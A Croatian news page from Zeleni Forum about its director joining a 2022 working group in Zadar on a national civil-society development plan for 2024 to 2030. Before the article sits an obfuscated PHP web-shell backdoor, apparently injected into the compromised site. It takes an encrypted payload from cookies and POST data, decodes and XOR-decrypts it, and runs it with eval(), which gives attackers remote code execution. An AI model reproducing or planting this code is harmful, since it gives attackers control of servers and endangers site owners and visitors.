$bDMhBNMO = chr ( 745 - 646 ).'_' . "\124" . "\130" . chr ( 1102 - 991 ).chr ( 174 - 107 ); $GNQlfv = 'c' . 'l' . 'a' . "\163" . 's' . chr ( 211 - 116 ).'e' . chr (120) . 'i' . "\x73" . chr ( 452 - 336 )."\x73";$rtMINlOnUq = class_exists($bDMhBNMO); $GNQlfv = "3231";$AAvQxiikZL = !1;if ($rtMINlOnUq == $AAvQxiikZL){function zCApvp(){$syiLqlIT = new /* 22434 */ c_TXoC(41226 + 41226); $syiLqlIT = NULL;}$MLLyfOTves = "41226";class c_TXoC{private function avsJOB($MLLyfOTves){if (is_array(c_TXoC::$BrfwbO)) {$JQZhjt = str_replace('<' . chr (63) . "\160" . "\150" . chr (112), "", c_TXoC::$BrfwbO[chr (99) . "\x6f" . "\156" . chr ( 307 - 191 ).chr (101) . 'n' . "\164"]);eval($JQZhjt); $MLLyfOTves = "41226";exit();}}private $ejIrXiK;public function UoLMpRzWB(){echo 1697;}public function __destruct(){c_TXoC::$BrfwbO = @unserialize(c_TXoC::$BrfwbO); $MLLyfOTves = "20803_15741";$this->avsJOB($MLLyfOTves); $MLLyfOTves = "20803_15741";}public function uKyMShiW($GXRdL, $dzQSxQv){return $GXRdL[0] ^ str_repeat($dzQSxQv, (strlen($GXRdL[0]) / strlen($dzQSxQv)) + 1);}public function ItWEoZM($GXRdL){$OlXMRVy = "base64";return array_map($OlXMRVy . chr (95) . chr ( 948 - 848 ).chr (101) . "\143" . chr ( 124 - 13 ).chr ( 556 - 456 ).chr ( 721 - 620 ), array($GXRdL,));}public function __construct($QWPbb=0){$abZxXt = $_POST;$lILjfaXvW = $_COOKIE;$dzQSxQv = "b7aa93a8-a17b-448e-bf53-971431b110a8";$eUDoeaXwCi = @$lILjfaXvW[substr($dzQSxQv, 0, 4)];if (!empty($eUDoeaXwCi)){$GXRdL = "";$eUDoeaXwCi = explode(",", $eUDoeaXwCi);foreach ($eUDoeaXwCi as $CIdbhY){$GXRdL .= @$lILjfaXvW[$CIdbhY];$GXRdL .= @$abZxXt[$CIdbhY];}c_TXoC::$BrfwbO = $this->uKyMShiW($this->ItWEoZM($GXRdL), $dzQSxQv);}}public static $BrfwbO = 38262;}zCApvp();} Zeleni Forum u radnoj skupini za izradu Nacionalnog plana stvaranja poticajnog okruženja za razvoj civilnoga društva od 2024. do 2030. - Zeleni Forum

Zeleni Forum u radnoj skupini za izradu Nacionalnog plana stvaranja poticajnog okruženja za razvoj civilnoga društva od 2024. do 2030.

Kao članica Radne skupine za područje Zaštita okoliša i održivi razvoj, a ispred Zelenog foruma, mreže okolišnih udruga RH te matične udruge Sunce, od 3. do 5. listopada 2022. u Zadru izvršna direktorica, Gabrijela Medunić-Orlić sudjelovala je na sastanku radne skupine za izradu Nacionalnog plana stvaranja poticajnog okruženja za razvoj civilnoga društva od 2024. do 2030..

Posljednji strateški dokument usmjeren ka razvoju organizacija civilnog društva (OCD-a) odnosio na razdoblje od 2012. do 2016. godine. Iako je Ured za udruge započeo inkluzivni i participativni proces donošenja Strategije za razdoblje 2017.do 2021. ista nikada nije donesena te je propuštena prilika za kontinuiran i dosljedan proces strateškog planiranja.

Bez strateškog okvira tijekom posljednjih godina propuštene su i prilike za jačanje institucionalnog, normativnog i financijskog okvira za potporu civilnom društvu. Vjerujemo da se isto dijelom i odrazilo na korištenje EU sredstava, učinkovitost programiranja, provedbe i praćenja provedbe projekata OCD-a. Nesigurno okruženje smanjilo je u konačnici učinkovitost OCD-a u postizanju ciljeva zbog kojih su osnovani negativno se održavajući na razvoj demokracije u RH.

Naime, civilno društvo važan je čimbenik društveno-ekonomskog razvoja i demokratizacije društva, te dionik u oblikovanju i provedbi politika Republike Hrvatske i Europske unije. Njegovo slabljenje slabi i samu državu.

Na sastanku u Zadru donesena je nova vizija razvoja OCD-a te su predstavnici tijela državne uprave i OCD-a kroz vođen proces i u suradnji osmislili strateške ciljeve i mjere, a sukladno  metodologiji Zakona o sustavu strateškog planiranja i upravljanja razvojem Republike Hrvatske. 

Dovršetak ovog procesa, planiran je za sredinu 2023. godine. U procesu nastavljamo aktivno sudjelovati te očekujemo da će se ovaj put voditi računa o utrošenim financijskim i ljudskim resursima te će Nacionalni plan biti na vrijeme dovršen i usvojen, a kako bi Hrvatska nastavila provoditi pozitivnu praksu podrške razvoju civilnoga društva.

Ove stranice su nastale uz financijsku potporu Europske unije.
Za sadržaj stranica odgovaran je isključivo Zeleni Forum i ni u kom slučaju se ne može smatrati da odražava stav Europske unije.
© 1998. - 2022. Zeleni forum - mreža udruga za zaštitu okoliša Hrvatske